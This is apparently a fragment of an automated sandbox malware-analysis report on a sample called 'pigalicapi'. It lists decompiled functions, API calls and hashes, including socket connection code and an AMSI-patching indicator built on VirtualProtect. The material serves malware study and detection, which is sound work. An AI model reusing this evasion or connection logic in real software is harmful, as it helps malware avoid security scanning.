                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 10001507
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                          • Opcode ID: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                          • Instruction ID: 25e538b33cc42fa1af6dbc26f5ecb21efd633c51d41fb312bc782d6f26faee88
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1871F874E04109EFEB08DF94C990AAEB7B2FF48345F248598E915AB345D735EE81CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                                                                                          			E0400A090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                          				signed char _v8;
                                                                                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                                                                                          				signed char _v13;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				short _v34;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                          				char* _t42;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_push(6);
                                                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                                                          				_push(2);
                                                                                                                                                                                                                                                                          				L0400B210();
                                                                                                                                                                                                                                                                          				_v20 = __eax;
                                                                                                                                                                                                                                                                          				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                          					_v36 = 2;
                                                                                                                                                                                                                                                                          					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                          					L0400B20A();
                                                                                                                                                                                                                                                                          					_v34 = 2;
                                                                                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                                                                                          					L0400B204();
                                                                                                                                                                                                                                                                          					_v12 = 2;
                                                                                                                                                                                                                                                                          					if(_v12 == 0) {
                                                                                                                                                                                                                                                                          						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                          					_v40 = 0;
                                                                                                                                                                                                                                                                          					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                          						_push(0x10);
                                                                                                                                                                                                                                                                          						_t42 =  &_v36;
                                                                                                                                                                                                                                                                          						_push(_t42);
                                                                                                                                                                                                                                                                          						_push(_v20);
                                                                                                                                                                                                                                                                          						L0400B1FE();
                                                                                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                                                                                          							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v13 = 1;
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                          							_v44 = _a16;
                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                          							_push(0x1005);
                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                          							_push(0x1006);
                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return _v20;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t40 = _v20;
                                                                                                                                                                                                                                                                          					_push(_t40);
                                                                                                                                                                                                                                                                          					L0400B1F8();
                                                                                                                                                                                                                                                                          					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x0400a096
                                                                                                                                                                                                                                                                          0x0400a098
                                                                                                                                                                                                                                                                          0x0400a09a
                                                                                                                                                                                                                                                                          0x0400a09c
                                                                                                                                                                                                                                                                          0x0400a0a1
                                                                                                                                                                                                                                                                          0x0400a0a8
                                                                                                                                                                                                                                                                          0x0400a0b7
                                                                                                                                                                                                                                                                          0x0400a0bf
                                                                                                                                                                                                                                                                          0x0400a0c0
                                                                                                                                                                                                                                                                          0x0400a0c5
                                                                                                                                                                                                                                                                          0x0400a0cc
                                                                                                                                                                                                                                                                          0x0400a0cd
                                                                                                                                                                                                                                                                          0x0400a0d2
                                                                                                                                                                                                                                                                          0x0400a0d9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a0ea
                                                                                                                                                                                                                                                                          0x0400a0e5
                                                                                                                                                                                                                                                                          0x0400a0f2
                                                                                                                                                                                                                                                                          0x0400a0f9
                                                                                                                                                                                                                                                                          0x0400a0fd
                                                                                                                                                                                                                                                                          0x0400a10f
                                                                                                                                                                                                                                                                          0x0400a117
                                                                                                                                                                                                                                                                          0x0400a119
                                                                                                                                                                                                                                                                          0x0400a11c
                                                                                                                                                                                                                                                                          0x0400a120
                                                                                                                                                                                                                                                                          0x0400a121
                                                                                                                                                                                                                                                                          0x0400a128
                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                          0x0400a138
                                                                                                                                                                                                                                                                          0x0400a14c
                                                                                                                                                                                                                                                                          0x0400a151
                                                                                                                                                                                                                                                                          0x0400a154
                                                                                                                                                                                                                                                                          0x0400a159
                                                                                                                                                                                                                                                                          0x0400a15a
                                                                                                                                                                                                                                                                          0x0400a15f
                                                                                                                                                                                                                                                                          0x0400a167
                                                                                                                                                                                                                                                                          0x0400a168
                                                                                                                                                                                                                                                                          0x0400a16d
                                                                                                                                                                                                                                                                          0x0400a172
                                                                                                                                                                                                                                                                          0x0400a173
                                                                                                                                                                                                                                                                          0x0400a178
                                                                                                                                                                                                                                                                          0x0400a180
                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a186
                                                                                                                                                                                                                                                                          0x0400a13a
                                                                                                                                                                                                                                                                          0x0400a13d
                                                                                                                                                                                                                                                                          0x0400a13e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a143
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 0400A09C
                                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 0400A0C0
                                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 0400A0CD
                                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0400A121
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 0400A13E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                                          • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                          • Instruction ID: a070b3506782e3d460d1e62e3f028d70face053f71bdd0f6ca274d7f1f380b7b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65312B70B00319ABEB10EFE4D845BFEB7B5AF98314F108659E5217B2C0E7B5A940CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                                                                                          			E00401110(signed int** _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _t10;
                                                                                                                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                                                                                                                          				intOrPtr* _t24;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t10 =  *( *_a4);
                                                                                                                                                                                                                                                                          				if(_t10 > 0xc0000091) {
                                                                                                                                                                                                                                                                          					if(_t10 == 0xc0000094) {
                                                                                                                                                                                                                                                                          						_t23 = 0;
                                                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						 *_t24 = 8;
                                                                                                                                                                                                                                                                          						L00402438();
                                                                                                                                                                                                                                                                          						if(_t10 == 1) {
                                                                                                                                                                                                                                                                          							_v24 = 1;
                                                                                                                                                                                                                                                                          							 *_t24 = 8;
                                                                                                                                                                                                                                                                          							L00402438();
                                                                                                                                                                                                                                                                          							if(_t23 != 0) {
                                                                                                                                                                                                                                                                          								return E00401DC8(_t10) | 0xffffffff;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_t10 != 0) {
                                                                                                                                                                                                                                                                          							 *_t24 = 8;
                                                                                                                                                                                                                                                                          							 *_t10();
                                                                                                                                                                                                                                                                          							return 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_t10 == 0xc0000096) {
                                                                                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						 *_t24 = 4;
                                                                                                                                                                                                                                                                          						L00402438();
                                                                                                                                                                                                                                                                          						if(_t10 == 1) {
                                                                                                                                                                                                                                                                          							_v24 = 1;
                                                                                                                                                                                                                                                                          							 *_t24 = 4;
                                                                                                                                                                                                                                                                          							L00402438();
                                                                                                                                                                                                                                                                          							return _t10 | 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_t10 == 0) {
                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						 *_t24 = 4;
                                                                                                                                                                                                                                                                          						 *_t10();
                                                                                                                                                                                                                                                                          						return 0xffffffff;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_t10 != 0xc0000093) {
                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                          					_t23 = 1;
                                                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(_t10 < 0xc000008d) {
                                                                                                                                                                                                                                                                          					if(_t10 == 0xc0000005) {
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						 *_t24 = 0xb;
                                                                                                                                                                                                                                                                          						L00402438();
                                                                                                                                                                                                                                                                          						if(_t10 == 1) {
                                                                                                                                                                                                                                                                          							_v24 = 1;
                                                                                                                                                                                                                                                                          							 *_t24 = 0xb;
                                                                                                                                                                                                                                                                          							L00402438();
                                                                                                                                                                                                                                                                          							return _t10 | 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_t10 == 0) {
                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						 *_t24 = 0xb;
                                                                                                                                                                                                                                                                          						 *_t10();
                                                                                                                                                                                                                                                                          						return 0xffffffff;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_t10 != 0xc000001d) {
                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                          0x0040111c
                                                                                                                                                                                                                                                                          0x00401123
                                                                                                                                                                                                                                                                          0x00401165
                                                                                                                                                                                                                                                                          0x004011b4
                                                                                                                                                                                                                                                                          0x00401131
                                                                                                                                                                                                                                                                          0x00401131
                                                                                                                                                                                                                                                                          0x00401139
                                                                                                                                                                                                                                                                          0x00401140
                                                                                                                                                                                                                                                                          0x00401148
                                                                                                                                                                                                                                                                          0x0040123b
                                                                                                                                                                                                                                                                          0x00401243
                                                                                                                                                                                                                                                                          0x0040124a
                                                                                                                                                                                                                                                                          0x00401251
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401262
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401253
                                                                                                                                                                                                                                                                          0x00401150
                                                                                                                                                                                                                                                                          0x004011f0
                                                                                                                                                                                                                                                                          0x004011f7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011f9
                                                                                                                                                                                                                                                                          0x00401156
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401156
                                                                                                                                                                                                                                                                          0x0040116c
                                                                                                                                                                                                                                                                          0x00401186
                                                                                                                                                                                                                                                                          0x00401186
                                                                                                                                                                                                                                                                          0x0040118e
                                                                                                                                                                                                                                                                          0x00401195
                                                                                                                                                                                                                                                                          0x0040119d
                                                                                                                                                                                                                                                                          0x00401203
                                                                                                                                                                                                                                                                          0x0040120b
                                                                                                                                                                                                                                                                          0x00401212
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401217
                                                                                                                                                                                                                                                                          0x004011a1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011a3
                                                                                                                                                                                                                                                                          0x004011aa
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011ac
                                                                                                                                                                                                                                                                          0x00401173
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040112c
                                                                                                                                                                                                                                                                          0x0040112c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040112c
                                                                                                                                                                                                                                                                          0x0040112a
                                                                                                                                                                                                                                                                          0x0040117d
                                                                                                                                                                                                                                                                          0x004011bc
                                                                                                                                                                                                                                                                          0x004011c4
                                                                                                                                                                                                                                                                          0x004011cb
                                                                                                                                                                                                                                                                          0x004011d3
                                                                                                                                                                                                                                                                          0x0040121f
                                                                                                                                                                                                                                                                          0x00401227
                                                                                                                                                                                                                                                                          0x0040122e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401233
                                                                                                                                                                                                                                                                          0x004011d7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011dd
                                                                                                                                                                                                                                                                          0x004011e4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011e6
                                                                                                                                                                                                                                                                          0x00401184
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401184
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: signal
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1946981877-0
                                                                                                                                                                                                                                                                          • Opcode ID: b9bb587fe7c6cb3023dc2312aa5bc470187502754f4a2d40641746054c1a0613
                                                                                                                                                                                                                                                                          • Instruction ID: ea7fa943b60d7b9f1addb821176663a5204698881c51cde0c619178f84824117
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9bb587fe7c6cb3023dc2312aa5bc470187502754f4a2d40641746054c1a0613
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB2101701042018AD7247B69854432F76D06B4A328F554B3FE6EAEB3E1C7BDC884975B
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(10004070,00000000,00000800), ref: 10002509
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,10004078), ref: 10002525
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 10002560
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 10002581
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID: AMSI
                                                                                                                                                                                                                                                                          • API String ID: 3300690313-3828877684
                                                                                                                                                                                                                                                                          • Opcode ID: 39020bfaabfcf144605de5e0a77759fb48e00e494b42d059a3f8fbf759fe6226
                                                                                                                                                                                                                                                                          • Instruction ID: 1f1fccf587520e98a24689dc9d6c387d6eb81e8a4efd5f3f63844951b48620cd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39020bfaabfcf144605de5e0a77759fb48e00e494b42d059a3f8fbf759fe6226
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D111CB4D01209EFEB04CF94CC99BAEBBB4FB48341F208559EA01B7384D7706A40DB59
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                          			E04009290() {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                          0x04009296
                                                                                                                                                                                                                                                                          0x040092b4
                                                                                                                                                                                                                                                                          0x040092bb
                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                          0x040092d1

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 040092A7
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 040092AE
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 040092C1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                          • Opcode ID: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                          • Instruction ID: 4f9345edf5834c8cb0bc8acfac962fe0122c83c58fee2cee7c9637e45e33d241
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5E09275D04308EBEB04DFF4D94DB9D7B78EB08205F504694E545B2140D6786A54CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                          			E04007250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                                                                                          				signed int _v68;
                                                                                                                                                                                                                                                                          				intOrPtr* _v72;
                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                                                                          				short* _t69;
                                                                                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 1;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                          					_t58 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          					_v12 = _t58;
                                                                                                                                                                                                                                                                          					E04007D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                          					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                          					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                                          					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                          					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                          						_v48 = 0x10;
                                                                                                                                                                                                                                                                          						_v44 = 0x10;
                                                                                                                                                                                                                                                                          						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                          							_v72 =  &_v64;
                                                                                                                                                                                                                                                                          							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                          							_t91 = _v72;
                                                                                                                                                                                                                                                                          							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                          							_t68 = _t101;
                                                                                                                                                                                                                                                                          							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                          							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                          							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                          							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                          							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                          							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                          							_t70 = E04009910();
                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                          							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                          							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                          								_v5 = 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                                          0x04007256
                                                                                                                                                                                                                                                                          0x0400725e
                                                                                                                                                                                                                                                                          0x040073af
                                                                                                                                                                                                                                                                          0x040073b5
                                                                                                                                                                                                                                                                          0x04007285
                                                                                                                                                                                                                                                                          0x04007295
                                                                                                                                                                                                                                                                          0x04007298
                                                                                                                                                                                                                                                                          0x0400729d
                                                                                                                                                                                                                                                                          0x040072a8
